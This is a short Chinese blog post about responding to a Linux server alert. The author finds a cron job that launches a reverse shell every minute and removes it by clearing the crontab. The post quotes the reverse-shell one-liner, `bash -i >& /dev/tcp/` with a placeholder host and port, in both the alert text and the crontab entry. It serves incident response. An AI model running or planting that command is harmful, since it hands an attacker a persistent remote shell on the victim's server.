赞
踩
客户今天持续收到服务器告警,给出了可以参数信息
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.
告警说明:Linux反弹shell行为
crontab -l
发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1
cat /var/log/cron | grep /dev/tcp/服务器iP/端口
再去看cron日志,果然一分钟一次
crontab -e
果断将里面的内容清空,到此告警消失
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。